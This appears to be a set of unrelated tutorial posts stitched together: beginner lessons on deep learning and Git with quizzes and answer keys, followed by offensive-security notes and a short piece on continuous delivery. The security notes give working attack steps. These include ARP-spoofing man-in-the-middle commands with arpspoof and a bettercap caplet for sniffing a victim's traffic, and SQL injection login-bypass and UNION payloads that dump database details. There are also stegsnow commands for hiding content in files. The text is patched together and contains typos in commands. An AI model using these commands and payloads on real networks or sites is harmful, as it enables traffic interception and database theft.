Deep Learning and Neural Networks – Let’s Dive In!

Today, we’re going to unveil the fascinating world of deep learning and how it supercharges our neural networks.

Define Deep Learning and Its Relationship to Neural Networks

Alright, picture this: neural networks are like the engines of AI, and deep learning is the fuel that makes them roar! 🚗💨

  • Deep Learning: It’s a subset of machine learning where we stack multiple neural networks on top of each other. Deep learning is all about going deep (hence the name) and extracting intricate patterns from data.
  • Neural Networks: These are the brains of our AI operations. They’re designed to mimic our own brain’s structure, with layers of interconnected ‘neurons.’ Each layer processes data in its unique way, leading to more complex understanding as we go deeper.

For a deeper dive into deep learning, you can check out the official Deep Learning Guide by TensorFlow.

Learn Why Deep Neural Networks Are Powerful for Complex Tasks

Imagine your smartphone evolving from a simple calculator to a full-fledged gaming console. That’s what happens when we make neural networks deep! 📱🎮

  • Powerful for Complex Tasks: Deep neural networks can tackle super tough problems. They recognize objects in images, understand human speech, and even beat world champions at board games. 🎉🏆
  • Hierarchical Learning: Each layer in a deep network learns a different level of abstraction. The early layers spot basic features, like edges, while the deeper layers understand complex combinations of these features. It’s like learning to draw lines before creating masterpieces!

To see some real-world applications of deep learning, visit the Deep Learning Examples on the official PyTorch website.

Now, let’s put your newfound knowledge to the test with these questions:

Question 1: What is the relationship between deep learning and neural networks?

A) Deep learning is a type of neural network.
B) Deep learning fuels neural networks.
C) Deep learning stacks multiple neural networks.
D) Deep learning and neural networks are unrelated.

Question 2: How do deep neural networks handle complex tasks compared to shallow networks?

A) They perform worse on complex tasks.
B) They process data in a more basic way.
C) They can recognize intricate patterns and solve complex problems.
D) They require less training.

Question 3: What does each layer in a deep neural network learn as we go deeper?

A) The same information at different scales.
B) Complex patterns and combinations of features.
C) Nothing, they’re just placeholders.
D) Basic features like edges and colors.

Question 4: What’s an example of a complex task that deep neural networks excel at?

A) Simple arithmetic calculations.
B) Recognizing objects in images.
C) Identifying primary colors.
D) Writing poetry.

Question 5: What’s the primary benefit of using deep neural networks for complex tasks?

A) They require less computational power.
B) They process data faster.
C) They can understand intricate patterns.
D) They make AI less powerful.

1C – 2C – 3B – 4B – 5C

Teamwork Made Easy: Using Git for Collaborative Development

In this lesson, we’ll dive into the world of collaborative development using Git. We’ll explore remote repositories and learn how to clone, push, and pull changes to and from them.

Introduce the Concept of Remote Repositories

A remote repository is a Git repository hosted on a server, typically on the internet or a network. It allows multiple developers to collaborate on a project by sharing their changes with one another. Here’s why remote repositories are crucial:

  • Collaboration: Developers working on the same project can access and contribute to the codebase from different locations.
  • Backup: Remote repositories serve as a backup, protecting your project’s history from data loss.
  • Version Control: They provide a central location for tracking changes made by different team members.

Clone a Repository from a Remote Source

Cloning a Repository (git clone):

  • To clone a remote repository to your local machine, use the git clone command, followed by the repository’s URL:
git clone
  • This command creates a local copy of the remote repository, allowing you to work on it and collaborate with others.

Push and Pull Changes from/to Remote Repositories

Pushing Changes to a Remote Repository (git push):

Once you’ve made local commits, you can push those changes to the remote repository:

git push origin branchname

This command sends your local commits to the remote repository.

Pulling Changes from a Remote Repository (git pull):

To retrieve changes made by others in the remote repository, use the git pull command:

git pull origin branchname

This command fetches and merges changes from the remote repository into your current branch.

Collaborative development with Git and remote repositories is an essential part of modern software development.


Question 1: What is the primary purpose of remote repositories in Git?

a) To slow down development.
b) To serve as a personal backup of your code.
c) To enable collaboration and sharing of code among multiple developers.
d) To keep code secret and inaccessible to others.

Question 2: Which Git command is used to clone a remote repository to your local machine?

a) git copy
b) git create
c) git clone
d) git fetch

Question 3: What does the git push command do in Git?

a) Retrieves changes from a remote repository.
b) Deletes all commits from a branch.
c) Sends your local commits to a remote repository.
d) Creates a new branch in the remote repository.

Question 4: How do you fetch and merge changes from a remote repository into your local branch?

a) Use `git update`.
b) Use `git merge origin branchname`.
c) Use `git pull origin branchname`.
d) Use `git push origin branchname`.

Question 5: Why is collaborative development with remote repositories important in Git?

a) It helps developers work in isolation without sharing their code.
b) It ensures that only one person can work on the project at a time.
c) It allows multiple developers to collaborate and track changes effectively.
d) It prevents developers from making any changes to a project.

1C – 2C – 3C – 4C – 5C

How Neural Networks Learn – Let’s Dive In!

Hey there, future AI experts! 🚀

Today, we’re going to uncover the magical way in which neural networks learn from data.

It’s a bit like solving a challenging puzzle, but incredibly rewarding once you grasp it.

Introduce the Concept of Weights and Biases

Think of a neural network as a young chef, eager to create a perfect dish. To achieve culinary excellence, the chef needs to balance the importance of each ingredient and consider personal tastes.

  • Weights: These are like recipe instructions. They assign importance to each ingredient in the dish, guiding how much attention it should receive during cooking.
    Here’s a link to the official TensorFlow documentation on weights and losses.
  • Biases: Imagine biases as the chef’s personal preferences. They influence how much the chef leans towards certain flavors, even if the recipe suggests otherwise.
    For an in-depth look, check out this link to the official PyTorch documentation on biases.

Learn How Neural Networks Adjust Weights to Learn from Data

Our aspiring chef doesn’t achieve culinary brilliance right away; they learn through trial and error, just like perfecting a skateboard trick or acing a video game level.

  • Learning from Mistakes: When the chef’s dish turns out too bland or too spicy, they analyze which recipe notes (weights) need fine-tuning. It’s a process of continuous improvement.

Let’s try with another example.

Imagine you’re learning to play a video game, and you want to get better at it. To improve, you need to pay attention to your mistakes and make adjustments. Neural networks work in a similar way when learning from data.

  1. Initial Setup:
    • At the beginning, a neural network doesn’t know much about the task it’s supposed to perform. It’s like starting a new game without any knowledge of the rules.
  2. Making Predictions:
    • Just like you play the game and make moves, the neural network takes in data and makes predictions based on its initial understanding. These predictions might not be very accurate at first.
  3. Comparing to Reality:
    • After making predictions, the neural network compares them to the real correct answers. It’s similar to checking if the moves you made in the game matched what you should have done.
  4. Calculating Mistakes:
    • If the neural network’s prediction doesn’t match the correct answer, it calculates how far off it was. This difference is the “mistake” or “error.” It’s like realizing where you went wrong in the game.
  5. Adjusting Weights:
    • Now, here’s the cool part! The neural network figures out which parts of its “knowledge” (represented as weights) led to the mistake. It fine-tunes these weights, making them a little heavier or lighter. It’s similar to adjusting your game strategy to avoid making the same mistake again.
  6. Repeating the Process:
    • The neural network keeps doing this for many examples, just like you play the game multiple times to get better. With each round, it learns from its mistakes and becomes more accurate.
  7. Continuous Improvement:
    • Over time, the neural network becomes really good at the task, just like you become a pro at the game. It’s all about learning from experiences and fine-tuning its “knowledge” until it gets things right most of the time.

So, in a nutshell, neural networks learn by making predictions, comparing them to reality, calculating mistakes, and adjusting their “knowledge” (weights) to get better and better at their tasks. It’s like leveling up in a game, but instead of gaining experience points, the neural network gains knowledge.

Understand the Importance of Training and Optimization

Going back to our chef, becoming a top chef requires dedication and practice. The same applies to neural networks.

  • Training: Think of it as the chef practicing their dish repeatedly, tweaking the ingredients and techniques until they achieve perfection.
    This link to the official Keras documentation provides insights into training neural networks.
  • Optimization: This is like refining the cooking process – finding the ideal cooking time, temperature, and seasoning to create the perfect dish. It’s all about efficiency and quality.
    For a comprehensive understanding, explore this link to the official TensorFlow documentation on optimization.


Now, let’s check your understanding with some thought-provoking questions:

Question 1: What purpose do weights serve in a neural network?

A) They determine the chef’s personal preferences.
B) They assign importance to each ingredient in the dish.
C) They represent the dish’s ingredients.
D) They make the dish taste better.

Question 2: How does a neural network learn from its errors?

A) By avoiding cooking altogether.
B) By making gradual adjustments to weights.
C) By adding more spices to the dish.
D) By trying a different recipe.

Question 3: Why are biases important in a neural network?

A) They ensure that the chef follows the recipe precisely.
B) They add randomness to the cooking process.
C) They influence the chef’s personal taste in flavors.
D) They are not essential in neural networks.

Question 4: What does training in a neural network involve?

A) Cooking a perfect dish on the first attempt.
B) Repeatedly practicing and adjusting the recipe.
C) Ignoring the learning process.
D) Memorizing the recipe.

Question 5: In the context of neural networks, what does optimization refer to?

A) Finding the best cooking method for a dish.
B) Making the dish taste terrible.
C) Using the recipe exactly as it is.
D) Cooking just once to save time.

1B – 2B – 3C – 4B – 5A

Git Harmony: Branch and Merge

Today, we’ll explore the concepts of branches and merging, which are fundamental to collaborative and organized development with Git.

Learn About Branches and Why They’re Important

A branch in Git is like a separate line of development. It allows you to work on new features, bug fixes, or experiments without affecting the main project until you’re ready. Here’s why branches are essential:

  • Isolation: Branches keep your work isolated, so it won’t interfere with the main project or other developers’ work.
  • Collaboration: Multiple developers can work on different branches simultaneously and later merge their changes together.
  • Experimentation: You can create branches to test new ideas without committing to them immediately.

Create and Switch Between Branches

Creating a New Branch (git branch):

To create a new branch, use the following command, replacing branchname with a descriptive name for your branch:

git branch branchname

Switching to a Branch (git checkout):

To switch to a branch, use the git checkout command:

git checkout branchname

Creating and Switching to a New Branch in One Command (git checkout -b):

A common practice is to create and switch to a new branch in one command:

git checkout -b newbranchname

Understand How to Merge Branches

Merging a Branch into Another (git merge):

After making changes in a branch, you can merge those changes into another branch (often the main branch) using the git merge command.

# Switch to the target branch (e.g., main)
git checkout main
# Merge changes from your feature branch into main
git merge feature-branch

Git will automatically integrate the changes from the feature branch into the main branch, creating a new commit.

Branching and merging are powerful tools for managing complex projects and collaborating effectively with others.

Question 1: What is the primary purpose of using branches in Git?

a) To clutter your project with unnecessary files.
b) To prevent any changes to the main project.
c) To isolate different lines of development and collaborate on new features or fixes.
d) To merge all changes immediately.

Question 2: Which Git command is used to create a new branch?

a) git make
b) git branch
c) git create
d) git newbranch

Question 3: How can you switch to a different branch in Git?

a) Use `git switch branchname`.
b) Use `git change branchname`.
c) Use `git checkout branchname`.
d) Use `git swap branchname`.

Question 4: What does the git merge command do in Git?

a) It deletes a branch.
b) It creates a new branch.
c) It integrates changes from one branch into another.
d) It renames a branch.

Question 5: Why might you want to create a branch for a new feature or experiment in Git?

a) To immediately apply changes to the main project.
b) To make your project look more complex.
c) To work on new ideas without affecting the main project.
d) To confuse other developers.

1C – 2B – 3C – 4C – 5C

The Need for Version Control

Why Version Control?

Version control is a system that helps track changes to files and folders over time. It is crucial for several reasons:

  • History Tracking: Version control allows you to maintain a detailed history of changes made to your project files. This history includes who made the changes, what changes were made, and when they were made.
  • Collaboration: In collaborative projects, multiple developers often work on the same codebase simultaneously. Version control enables seamless collaboration by managing changes and ensuring that everyone is working on the latest version of the project.
  • Error Recovery: Mistakes happen. With version control, you can easily revert to a previous working state if something goes wrong, reducing the risk of losing valuable work.
  • Code Reviews: Version control systems facilitate code reviews by providing a platform to discuss and suggest changes before integrating new code into the main project.

What Git Is and Its Role in Collaborative Development

Git is a distributed version control system designed to handle everything from small to very large projects efficiently. It was created by Linus Torvalds in 2005 and has since become the de facto standard for version control in the software development industry.

Key Concepts of Git

  • Repository: A repository, or repo, is a collection of files and their complete history of changes. It exists on your local machine as well as on remote servers.
  • Commit: A commit is a snapshot of your repository at a specific point in time. Each commit has a unique identifier and contains the changes you’ve made.
  • Branch: A branch is a separate line of development within a repository. It allows you to work on new features or fixes without affecting the main codebase.
  • Merge: Merging is the process of combining changes from one branch into another. It’s used to integrate new code into the main project.
  • Pull Request: In Git-based collaboration, a pull request is a way to propose and discuss changes before they are merged into the main branch.

Local vs Remote Repositories

  • Local Repository: A local repository resides on your computer and contains the entire history of the project. You can work on your code, make commits, and experiment without affecting others.
  • Remote Repository: A remote repository is hosted on a server (like GitHub, GitLab, or Bitbucket). It serves as a central hub where developers can share and collaborate on their code. Remote repositories ensure that all team members are working with the same codebase.

Syncing Local and Remote Repositories

To collaborate effectively, you need to sync your local repository with the remote repository:

  • Push: Pushing involves sending your local commits to the remote repository, making your changes available to others.
  • Pull: Pulling is the process of fetching changes from the remote repository and merging them into your local repository.
  • Fetch: Fetching retrieves changes from the remote repository without automatically merging them into your local repository.

In summary, version control, particularly Git, is the backbone of collaborative development. It empowers teams to work together efficiently, track changes, and manage complex projects seamlessly. Understanding the distinction between local and remote repositories is fundamental to successful collaboration.

Man In The Middle (MITM)

In the man in the middle attack the attacker will put himself in the middle of the communication between the victim and the other device, that could be a proxy, another server, and so on, intercept and see anything that is being transferred between the two devices.

One of the working method to achieve the MITM attack is through the ARP spoofing.

ARP spoofing

ARP stands for Address Resolution Protocol.

The ARP spoofing consists in the redirecting all the packet traffic flow using the ARP protocol.

The ARP allows a device to exchange data with another device (normally a proxy) associating the device ip to the mac address using a matrix table (ARP table) in which all IPs are “converted” in a mac address. This ART table is saved in every device of the network, so every device of the network knows every couple “ip – mac address” of all devices of the network

The attacker, so, will replace, in the above table of the victim device, the mac address of the proxy with his own. In this way the victim wii think to exchange data with the proxy but in practice is going to exchange data with the hacker. Do you know the movie “face off”?…

To show this ARP table, open your cli and type (in whatever OS):

arp -a

the result is a list of match (<IP>) at <Mac address>

root@kali:~# arp -a
_gateway ( at e4:8f:34:37:ba:04 [ether] on eth0
Giuseppes-MBP.station ( at a4:83:e7:0b:37:38 [ether] on eth0
GiuseppBPGrande.station ( at 3c:22:fb:b8:8c:c6 [ether] on eth0

in our example the router is ( at e4:8f:34:37:ba:4 and the victim is ( at a4:83:e7:0b:37:38

The MITM will try to impersonate the router in the ART table of the victim.

To do so we can use arpspoof

With airspoof we need to modify two ARP tables. The one of the victim and the one of the gateway:

arpspoof -i <interface> -t <victimip> <gatewayip>

arpspoof -i <interface> -t <gatewayip> <victimip>

Now, we’re going to enable the IP forwarding. We do that so that when the packets flow through our device, they don’t get dropped so that each packet that goes through our device gets actually forwarded to its destination. So, when we get a packet from the client, it goes to the router, and when a packet comes from the router, it should go to the client without being dropped in our device. So, we’re going to enable it using this command:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

The window device now thinks that the attacker device is the access point, and whenever the window device tries to communicate with the access point, it is going to send all these requests to the attacker device. This will place our attacker device in the middle of the connection, and we will be able to read all the packets, modify them, or drop them.


Another way to impersonate a device in the victim ARP table is the tool bettercap

how to use it:

bettercap -iface <networkinterface>

then you need to specify a module. In our case we need to enable net.probe module (to discover devices on the network) >  » net.probe on >  » [02:09:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe >  » [02:09:18] [sys.log] [inf] net.probe probing 256 addresses on >  » [02:09:18] [] endpoint detected as a4:83:e7:0b:37:38 (Apple, Inc.). >  » [02:09:18] [] endpoint detected as 3c:22:fb:b8:8c:c6 (Apple, Inc.). >  » [02:09:18] [] endpoint detected as 74:d4:23:c0:e4:88. >  » [02:09:18] [] endpoint detected as 80:0c:f9:a2:b0:5e. >  » [02:09:19] [] endpoint detected as 80:35:c1:52:d8:e3 (Xiaomi Communications Co Ltd). >  » [02:09:19] [] endpoint detected as d4:1b:81:15:b0:77 (Chongqing Fugui Electronics Co.,Ltd.). >  » [02:09:19] [] endpoint detected as 50:76:af:99:5b:3d (Intel Corporate). >  » [02:09:19] [] endpoint detected as b8:27:eb:26:8c:04 (Raspberry Pi Foundation). >  » [02:09:20] [] endpoint detected as 20:f4:78:1c:ed:dc (Xiaomi Communications Co Ltd). >  » [02:09:20] [] endpoint detected as dc:a6:32:d7:57:da (Raspberry Pi Trading Ltd). >  » [02:09:20] [] endpoint detected as 5a:92:d0:37:82:da. >  » [02:09:26] [] endpoint detected as 88:66:5a:3d:13:76 (Apple, Inc.). >  » [02:09:28] [] endpoint detected as 8e:c0:78:29:bd:34.

after that we can see all IPs and mac addresses type command

let’s spoof setting fullduplex true. This will allow to redirecting on both side (from/to the victim and from/to the gateway)

net.sniff on >  » set arp.spoof.fullduplex true >  » set <victimdeviceIP> >  » arp.spoof on

We are now in the middle of the connection.

To capture and analyse what is flowing in our system as MITM we can do >  » net.sniff on

Since this moment everything sent from the victim device will be shown on our screen.

Custom Spoofing script

To avoid every time to type every single command, it’s possible to create a script with all these commands together.

Create a text file (for instance spoofcommands.cap) with the list of all commands:

net.probe on
set arp.spoof.fullduplex true
set <victimdeviceIP>
arp.spoof on
net.sniff on

and type the following command:

bettercap -iface <networkinterface> -caplet spoofcommands.cap
SQL Injection

All websites that make interaction with a DB, use SQL.

But if the SQL script is not correctly written could be passible of some manipulation using the html form parameters, in which the attacker could put a malicious SQL code.

So to find a SQL Injection is very critical because it gives access to the entire DB as as admin.

How to discover SQL Injections

The easy way is to put in the html form input text some special SQL character like ‘ (single quote) ” (double quote) # (comment) and so on and see what happens.

We could get multiple result. An exception that could show the query which went wrong for instance.

Bypassing logins using SQL Injections

In a user/password login page we could set the username and in the password field we could specify the piece of query to continue the query of the login:

Let’s say that the query to login could be something like this:

select * from users where username='$username' and password='$password'

Where $username and $password are dynamically passed from the frontend.

Now, the login query could be hacked specifying a piece of sql as password.

For instance, the password field could be

password' and 1=1, in this way the query will be

select * from users where username='$username' and password='password' and 1=1

the worse sql injection could be:

$username = admin (or the whatever admin username)

$password = 123456′ or 1=1

In this case the query becomes:

select * from users where username='admin' and password='123456' or 1=1

Executing that query, assuming that admin is a real admin username, that query will always return true, even the password used is not correct, allowing us to enter as administrator.

Another way to use sql injection to try to bypass login is with comments just after the username, becasue whetever is written after comments is not used.

For instance a query like this:

select * from users where username = 'admin' #and password ='ciccio'

will return the user wich username is admin whatever could be the password.

In order to ahve a query like the above in the username we need to specify

$username = admin’ #

$password = whateverWeWant

The last query is the most interesting one because it allows us to have more complex query to gather more information from the database.

For instance we can add a union to get something else:

select * from users where username = 'admin' union select 1, database(), user(), version(), 5 #and password ='whateverWeWant'

In this case what we did was to use the following parameters:

$username = admin’ union select 1, database(), user(), version(), 5#

$password = whateverWeWant

Or, we can get DB information schema using another query after the union:

$username = admin’ union select 1, table_name, null, null, 5 from invormation_schemaa.tables#

$password = whateverWeWant

In this way you can get whatever you want from the DB, just putting an union query with the same column number of the first query (in our example is select * from users)

Discover SQL Injections

We can use

SQLMap cli tool to automate the sql injections using a specific url

OWASP ZAP, a UI tools very easy to use which find possibile SQL injections (but actually also other type of exploitations) on the entire website specifying also the field parameters to use 🙂

Prevent SQL Injection

To prevent sql injection on your sql scripts try to:

  • filter inputs
  • use parameterised statements!

Steganography is the practice of hiding a message inside of (or even on top of) something that is not secret.

The steganography has the double mission to hide and to deceive.

Of course not only messages can be hidden but also malware scripts.


There are a lot of tools that can hide things in images, files, and so on.

Snow is one of these.

Snow stands for Steganographic Nature Of Whitespace .

SNOW is a whitespace steganography tool that is used to embed hidden messages in ASCII format by extending the whitespace to the end of lines. This is done because the white spaces and tabs are not visible in text format to the viewers, thus making the messages hidden from the casual audience. The hidden messages are not available even if the built-in encryption is used to detect the message.

Snow is intended to be used with Windows. The Linux version is stegsnow.

To hide a message in a file (let’s say readme2.txt) using the content of an existing file (let’s say readme.txt):

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt 

For instance

root@kali:~# stegsnow -C -m "CIAO MAMMA guarda come mi diverto" -p "magic" readme.txt readme2.txt 
Compressed by 30.30%
Message exceeded available space by approximately 776.19%.
An extra 6 lines were added.

where in readme.txt there is a generic content.

After the command the readme2.txt will contain the content of readme.txt plus soma extra spaces and tab.

To decode the content of readme2.txt:

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt 

For instance:

root@kali:~# stegsnow -C -p "magic" readme2.txt 
CIAO MAMMA guarda come mi diverto
Functional Attack to API providers

We could have few security attacks to an API:

  • SQL Injections
  • Fuzzing
  • Cross site forgery
  • Session/token hijacking

SQL Injections

In this attack, the attacker tries to identify input parameters used in a SQL statement in order to manipulate the original query


Fuzz test or Fuzzing is a black box software testing technic which consist to inject random data to a service in order to find bugs

A fuzzer would try combinations of attacks on:

  • numbers (signed/unsigned integers/float…)
  • chars (urls, command-line inputs)
  • metadata : user-input text (id3 tag)
  • pure binary sequences

A common approach to fuzzing is to define lists of “known-to-be-dangerous values” (fuzz vectors) for each type, and to inject them or recombinations.

  • for integers: zero, possibly negative or very big numbers
  • for chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands…)
  • for binary: random ones

The hacker, then, analyse the response to understand vulnerability

So pay attention to which type of response error you send back. Don’t send, for instance, sql exception error.

Cross site forgery

In this case the hacker is able to execute a script, which call our API, using the user device.

To avoid this type of attack use POST instead of GET, split transactions in multiple step, add custom headers.

Token and Sessions Hijacking

This is basically a specialisation of the Cross site forgery, with the target of get the token saved on the client device.

So, the user in some way executes the attacker script which will read the token or the session cookie and use it to access to private resources

In this case suggestions are:

expire your token

use complex token pattern

use some additional security header, do not rely only on Access Tokens

Continuous Delivery (CD)

CD is an automated process of delivering code changes to server quickly and efficiently.

It is the natural extension of CI.

CD, so, it’s the practice of to be sure that the code is ready to be deployed in production.

The (old) process

Operations team will get regular requests to deploy artifacts of CI on servers to have QA tests.

Developers and Operation team need to work together to fix eventual deployment issues.

Because Deployment is not only deploy the artifact but also configuration change, Networking, and so on.

Then finally QA team can test further and send back feedback.

So there is too much human intervention in this process.

Solution is automation

Every step in deployment should be automated (server provision, dependencies, configuration change, deploy,…)


  • System automation (Ansible, Puppet, Chef,…)
  • Cloud infrastructure automation (Terraform, CFormation,…)
  • CICD automation (Jenkins, Octopus deploy,…)
  • Code testing
  • and many other

Ops team will write automation code for deployment

QA Testers will write automation code for software test

Dev team will write code and unit test code